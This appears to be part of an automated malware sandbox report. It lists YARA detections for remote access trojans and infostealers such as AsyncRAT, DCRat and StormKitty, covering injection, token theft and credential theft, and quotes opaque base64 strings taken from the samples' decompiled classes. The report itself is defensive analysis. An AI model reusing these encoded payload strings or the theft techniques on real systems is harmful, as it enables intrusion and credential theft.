Source: 14.2.5087.tmp.update.exe.2aa51fc.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 2.2.explorer.exe.f3c0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000018.00000002.3189493490.000000000511F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000002.3214014251.0000000006C60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000018.00000002.3188525129.0000000005100000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000018.00000002.3174046241.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000018.00000002.3152328073.00000000029C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000013.00000002.3142832732.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0000000E.00000002.2095704106.0000000002A98000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000012.00000002.2045157680.0000000000787000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000002D.00000002.2707163319.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000013.00000002.3187954223.000000001B234000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000002.00000003.1886548235.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000002.00000000.1786621795.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0000000E.00000000.1898904976.00000000006F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000E.00000002.2061125065.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000018.00000002.3152328073.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000000.1890364340.0000000000AC2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000002D.00000002.2773682295.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000002.00000000.1786520032.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000009.00000002.2874806986.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000018.00000002.3191349230.000000000515B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000006.00000002.3152347475.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000000E.00000002.2095704106.000000000294D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000A.00000002.2583636643.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000006.00000000.1865951347.0000000000192000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000018.00000002.3136390098.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000027.00000000.2525684288.0000000000277000.00000002.00000001.01000000.0000001B.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000002.00000000.1790427329.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000018.00000002.3152328073.000000000283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000012.00000002.2071994361.0000000002261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: 4336.tmp.Server.exe PID: 5720, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: 476D.tmp.Server.exe PID: 420, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: 4BC4.tmp.Client.exe PID: 7244, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: 5087.tmp.update.exe PID: 7408, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: 53A5.tmp.update.exe PID: 7508, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: 5E16.tmp.aaa.exe PID: 7640, type: MEMORYSTR	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: svchost.exe PID: 7952, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: jqnnpe.exe PID: 5184, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: svchost.exe PID: 796, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update2[1].pack, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\update[1].pack, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Temp\jqnnpe.exe, type: DROPPED	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe, type: DROPPED	Matched rule: MALWARE_Win_A310Logger author = ditekSHen, description = Detects A310Logger, snort_sid = 920204-920207

Source: 3CBD.tmp.Installer.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: accc.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 53A5.tmp.update.exe.2.dr, tYUuwGWptFEcm.cs	Base64 encoded string: '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
Source: 5E16.tmp.aaa.exe.2.dr, Settings.cs	Base64 encoded string: 'LAMmkbYim6ZwfzQdAQaLdpnRRRjyBqCCltTOWDNoXMMIalgspm3pyWEVkCRmT5rw0GW39dxj62TpWKzUzE8cdw==', 'yYw23vuccFfwR3P8jZ3MBf0c8qLQRtuAuh2uOrOWW3AKtnDbZNhnUxWFnMIGqymz1SxndenSoeuj8V+uKsbeKg==', 'lTT7RE5mbrzQuIcxXTALgC+B1YGscEYK7jEz095H9+Xo/WyhECOxJ/L2V8p7iUgkiHS5CC3+UilLWxJ1+K083A==', 'SLwTPCaiArk54CVXXqt61RFrKtV2wXrCeonPBA93AMa61r1F7L+XJHQryzwUEA5RnixZDJa5hK3eYSgu8zTAtQ==', 'nKtGTto1gGLF914EXjtgEkdwVcIT7hbMFgKLYBpOhzvopbRxXWe4TAkyuutKTB02G5H8v+ddwPjWHrnlxVpj7z8iKvZBIUQm/frC2FDR3uSRTmnTL0Zlu/LEKg2e8FPTbEDDIF7JiqmTTaA5NXXu8858erF6sGdb+qPO2ShyKnBUlnlQjrsOTKnAWcJFJ018wgGgMclY3DW5nQogT6QAhv1mz9Tq6O9xJSzUgTSNcsBQ0iTa1Wp8Rn5kmuAlj2bvzl2IyvvskSHFx90w8Uq/12WUP4KTUYyTNNRNNfnPF2koUSCkEyj7NMtlDMzRemfmFsfbpGavVJ67/5wxJ1SBiaYXDReYUWP+L7odHO1Ck3SxXAhu84JanXNE65CdjoQFo4+BH/I/fOiOZYYyTwrCF2B4rFdcT244wsYa0S/9UvJ+/8l0+qiYRwrsz2IGHDE5LFDT0fty+X4gv1Co89oPrTCQsdSvFCGDrdkAcb7nKWbaQNleXzVbiieFBPTXFKL6c+SWET0IwoZ+YCXd9rV02Sklgjli5tGYjjjfj6RJ/259Tee57sVlxFB/XFVpu0IFTC2fZgpLWjf72Uleb9qlisf7ctVKExCtyNoZC1jRWxCWfnOKEKiN5DvC1/vZ9nhEITtUCv366bWr38zT1zgXTgRJ3uEMqxWvOu8tLqSvVcbVkmT3bMF24ciaF0VKJtbLVaXELWm4fJq2uj7alykoWAZuW8p2cGxePxjAZL0AXSwiQ4i+c0Wp3UCFeS3SeTO71biPTMVmUr7MvnwJ2Qnkc+7WaSSBdVAelSBNa7roe0Z/oeOJWYq7sI9dbkp0CjNf84jeqTkr792S+yHtwZPmCLOmngWwYZi9EQHJXAmFSr/z2XlUlvfd1+X9CPsVi3gm51SIR+l6hoTEN67NUDo9CRYNdVJT0/YI069WnNc0izQrQhAWPxG92vEl+Whn8xlXmBsbqUnvsbYi2ZU4GLkPFyPp33w2ezAY0FmXjjGbNd5eGkvXHk7PE0ASbdPY4x7ag5maKJdeeai6jrq+d0ZB6fiRdcFmi2TmaDZrTFYq2pXJ6tZCAJHsNCjho6yGg1XT', 'oaHMVGr3Ryr+bRYfmjB3khVuRv0W7S7uadwRjsnNIRXnZfitH5272CHI/Nie7PkfvW41BBbf2d7ViQ7ggAGipnuzUBYuJUuOzaEhFe2sLwqXcUT5eciu3ltp7nPbUYNHRrkMilrhiJxaKo91ZaOWgTSE7xS8rA+4tc8QKW4OLssTVE2/0fh1yqOwgL5ZpujPuDyIYv6B9JilEIsrSCMWfQ38lW1OSbhrzo4JeGcwB+btCf2cF3QASjR5wb75378mLby8DtSS0M2dT3YtlL+MO951BINZSO7OpfPl0IgoZ+I=', 'ovYANo+tvDly7O+U8LEjuagsqr86tuq9Ffomc9MUIV5Cd8Vn0kBnKcu7P/XjCu4tvKUhx+OUec4qRT0GaTqWyg==', 's+h1KYqR5Ua/OwYMzaFWfcue5c5h/g3YpUExI20vVntz3tcqcs617/wSaYpgXHDAZJf71jfNfz6TAWzO7lqSNQ==', 'oBsiOQXJMQ/1DG/J4g/EX+EKI33iAOt4vLo9JdZ9zpZUTAdMpTvsLNd9v2exBDcPt4TPZGUIK2UowGIo8FVl9w=='
Source: 3CBD.tmp.Installer.exe.2.dr, vrSIoVmYiYR.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXTyzI1CtJzUlNL0rM1csvStdPyi8BABoLIu8cAAAA', 'H4sIAAAAAAAEANMvTs1L8U0tLk5MT7VPzkgsic9MsQUAJlwKPhUAAAA='
